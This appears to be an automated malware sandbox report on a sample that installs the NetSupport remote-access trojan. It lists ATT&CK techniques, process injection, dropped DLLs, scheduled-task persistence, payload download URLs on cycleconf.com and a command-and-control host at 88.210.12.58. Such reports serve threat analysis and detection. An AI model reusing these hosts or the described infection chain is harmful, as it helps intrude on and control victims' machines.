                                DLL Side-Loading                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		1
                                Masquerading                                		DCSync41
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Valid Accounts                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing1
                                System Network Configuration Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd323
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Hidden Files and Directories                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572207 Sample: Jjv9ha2GKn.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 38 ganeres1.com 2->38 40 geo.netsupportsoftware.com 2->40 42 cycleconf.com 2->42 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus detection for URL or domain 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 7 other signatures 2->60 9 Jjv9ha2GKn.exe 3 2->9         started        13 client32.exe 2->13         started        signatures3 process4 file5 36 C:\Users\user\AppData\...\Jjv9ha2GKn.exe.log, ASCII 9->36 dropped 70 Writes to foreign memory regions 9->70 72 Allocates memory in foreign processes 9->72 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->74 76 Injects a PE file into a foreign processes 9->76 15 AddInProcess32.exe 40 9->15         started        signatures6 process7 dnsIp8 48 cycleconf.com 23.254.224.41, 443, 49831, 49837 HOSTWINDSUS United States 15->48 28 C:\Users\user\AppData\...\remcmdstub.exe, PE32 15->28 dropped 30 C:\Users\user\AppData\Local\...\pcicapi.dll, PE32 15->30 dropped 32 C:\Users\user\...\msvcp140_codecvt_ids.dll, PE32 15->32 dropped 34 14 other files (4 malicious) 15->34 dropped 50 Found evasive API chain (may stop execution after checking mutex) 15->50 52 Uses schtasks.exe or at.exe to add and modify task schedules 15->52 20 client32.exe 17 15->20         started        24 schtasks.exe 1 15->24         started        file9 signatures10 process11 dnsIp12 44 ganeres1.com 88.210.12.58, 3785, 49865 CITYLAN-ASRU Russian Federation 20->44 46 geo.netsupportsoftware.com 104.26.0.231, 49869, 80 CLOUDFLARENETUS United States 20->46 62 Multi AV Scanner detection for dropped file 20->62 64 Contains functionalty to change the wallpaper 20->64 66 Delayed program exit found 20->66 68 Contains functionality to detect sleep reduction / modifications 20->68 26 conhost.exe 24->26         started        signatures13 process14

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Jjv9ha2GKn.exe47%ReversingLabsWin32.Trojan.Jalapeno
                                Jjv9ha2GKn.exe100%AviraTR/Kryptik.qykkd
                                Jjv9ha2GKn.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\DNScache\AudioCapture.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL3%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL3%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\PCICL32.DLL17%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL3%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\client32.exe21%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\msauserext.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\mscat32.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\neth.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\netmsg.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\DNScache\remcmdstub.exe5%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://cycleconf.com/dwnld/2nd2_4.zip20%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_1.zip20%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_2.zip50%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_4.zip100%Avira URL Cloudphishing
                                http://88.210.12.58/fakeurl.htm0%Avira URL Cloudsafe
                                http://www.crossteccorp.com0%Avira URL Cloudsafe
                                https://cycleconf.com/Q)0%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_1.zip100%Avira URL Cloudphishing
                                https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/0%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_2.zip100%Avira URL Cloudphishing
                                http://geo.netsupportsoftware.comlocation/loca.asp0%Avira URL Cloudsafe
                                http://crl.microso80%Avira URL Cloudsafe
                                https://cycleconf.com/Z)0%Avira URL Cloudsafe
                                https://cycleconf.com/dwnld/2nd2_3.zip100%Avira URL Cloudphishing

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		high
                                  ganeres1.com
                                  		88.210.12.58
                                  		truetrue
                                    		unknown
                                    cycleconf.com
                                    		23.254.224.41
                                    		truefalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                        		high
                                        https://cycleconf.com/dwnld/2nd2_4.zipfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://88.210.12.58/fakeurl.htmtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cycleconf.com/dwnld/2nd2_1.zipfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        https://cycleconf.com/dwnld/2nd2_2.zipfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        https://cycleconf.com/dwnld/2nd2_3.zipfalse
                                        • Avira URL Cloud: phishing
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.netsupportsoftware.comPCICL32.DLL.4.drfalse
                                          		high
                                          https://cycleconf.com/dwnld/2nd2_1.zip2AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://secure.globalsign.net/cacert/ObjectSign.crt09AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drfalse
                                            		high
                                            http://www.pci.co.uk/supportclient32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                              		high
                                              http://%s/testpage.htmwininet.dllclient32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drfalse
                                                		high
                                                https://cycleconf.com/dwnld/2nd2_4.zip2AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                  		high
                                                  http://www.pci.co.uk/supportsupportclient32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                    		high
                                                    http://www.crossteccorp.comAddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr, TCCTL32.DLL.4.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ocsp.thawte.com0TCCTL32.DLL.4.dr, PCICL32.DLL.4.drfalse
                                                      		high
                                                      http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                        		high
                                                        http://%s/testpage.htmclient32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drfalse
                                                          		high
                                                          https://cycleconf.com/Q)AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cycleconf.com/dwnld/2nd2_2.zip5AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geo.netsupportsoftware.comclient32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://127.0.0.1client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.symauth.com/cps0(AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drfalse
                                                              		high
                                                              http://geo.netsupportsoftware.com/location/loca.asplB.bg1client32.exe, 00000007.00000002.3301652835.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.globalsign.net/repository/0AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                  		high
                                                                  http://%s/fakeurl.htmclient32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drfalse
                                                                    		high
                                                                    https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/AddInProcess32.exe, 00000004.00000002.2880341312.0000000001020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://secure.globalsign.net/cacert/PrimObject.crt0AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                      		high
                                                                      http://geo.netsupportsoftware.com/location/loca.aspeclient32.exe, 00000007.00000003.3181897720.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303235612.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3182065927.0000000003349000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0TCCTL32.DLL.4.dr, PCICL32.DLL.4.drfalse
                                                                          		high
                                                                          http://www.symauth.com/rpa00AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drfalse
                                                                            		high
                                                                            http://geo.netsupportsoftware.comlocation/loca.aspclient32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.globalsign.net/repository09AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                              		high
                                                                              http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                                                		high
                                                                                http://crl.microso8AddInProcess32.exe, 00000004.00000002.2880341312.00000000010E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cycleconf.com/Z)AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://geo.netsupportsoftware.com/location/loca.asphclient32.exe, 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    88.210.12.58
                                                                                    		ganeres1.comRussian Federation
                                                                                    		25308CITYLAN-ASRUtrue
                                                                                    23.254.224.41
                                                                                    		cycleconf.comUnited States
                                                                                    		54290HOSTWINDSUSfalse
                                                                                    104.26.0.231
                                                                                    		geo.netsupportsoftware.comUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1572207
                                                                                    Start date and time:2024-12-10 08:56:19 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 59s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:10
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Jjv9ha2GKn.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.troj.evad.winEXE@9/27@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 84%
                                                                                    • Number of executed functions: 202
                                                                                    • Number of non-executed functions: 61
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 172.202.163.200
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Jjv9ha2GKn.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    02:57:13API Interceptor267x Sleep call for process: Jjv9ha2GKn.exe modified
                                                                                    02:59:06API Interceptor51x Sleep call for process: client32.exe modified
                                                                                    08:58:35Task SchedulerRun new task: DNScache path: C:\Users\user\AppData\Local\DNScache\client32.exe

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    88.210.12.585q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • http://88.210.12.58/fakeurl.htm
                                                                                    23.254.224.415q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      104.26.0.231file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      geo.netsupportsoftware.com5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • 104.26.0.231
                                                                                      ganeres1.com5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 88.210.12.58
                                                                                      cycleconf.com5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 23.254.224.41

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      HOSTWINDSUS5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 23.254.224.41
                                                                                      xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 142.11.240.128
                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 192.119.104.64
                                                                                      loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 142.11.240.155
                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 23.254.189.226
                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 23.254.189.241
                                                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 192.236.246.50
                                                                                      sora.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 23.254.189.223
                                                                                      https://dragonfly.cloudstore.business/file/d/1iZ8GX_NkrnJvRM8atkT-YMQtlk0GchX1/view?usp=sharing_eil_m&ts=98923449Get hashmaliciousUnknownBrowse
                                                                                      • 104.168.157.45
                                                                                      https://0nline.hrdocuments.online/?K2dM=7XWGet hashmaliciousUnknownBrowse
                                                                                      • 142.11.210.61
                                                                                      CITYLAN-ASRU5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 88.210.12.58
                                                                                      OocBsRyXoT.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 212.118.43.167
                                                                                      HNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 212.118.43.167
                                                                                      arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 212.118.43.167
                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 212.118.43.167
                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 212.118.43.167
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 88.210.6.42
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 88.210.6.42
                                                                                      0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                                                                      • 212.118.43.167
                                                                                      lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                                                                      • 212.118.43.167
                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.80.1
                                                                                      Valutazione della sicurezza IT - Azione urgente richiesta.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.117.116
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.1
                                                                                      matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                      • 104.21.84.67
                                                                                      SC3sPWT51E.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.161.29
                                                                                      4C1bAkWboc.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.70.164
                                                                                      SC3sPWT51E.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.65
                                                                                      ro7MnkIxJk.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.29.214
                                                                                      DqEJwd61Uw.exeGet hashmaliciousZhark RATBrowse
                                                                                      • 104.21.74.110
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 104.21.16.1

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      37f463bf4616ecd445d4a1937da06e19n09qkE6r6n.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 23.254.224.41
                                                                                      DqEJwd61Uw.exeGet hashmaliciousZhark RATBrowse
                                                                                      • 23.254.224.41
                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      • 23.254.224.41
                                                                                      Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                      • 23.254.224.41
                                                                                      Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                      • 23.254.224.41
                                                                                      http://crissertaoericardo.com.br/images/document.pif.rarGet hashmaliciousGuLoaderBrowse
                                                                                      • 23.254.224.41
                                                                                      tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                      • 23.254.224.41
                                                                                      A8Uynu9lwi.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 23.254.224.41
                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                      • 23.254.224.41
                                                                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 23.254.224.41

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\DNScache\AudioCapture.dll5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                        KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                          KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                            hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                        Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\DNScache\AudioCapture.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):93560
                                                                                                          Entropy (8bit):6.5461580255883876
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                          MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                          SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                          SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                          SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse
                                                                                                          • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                                          • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                                          • Filename: hkpqXovZtS.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
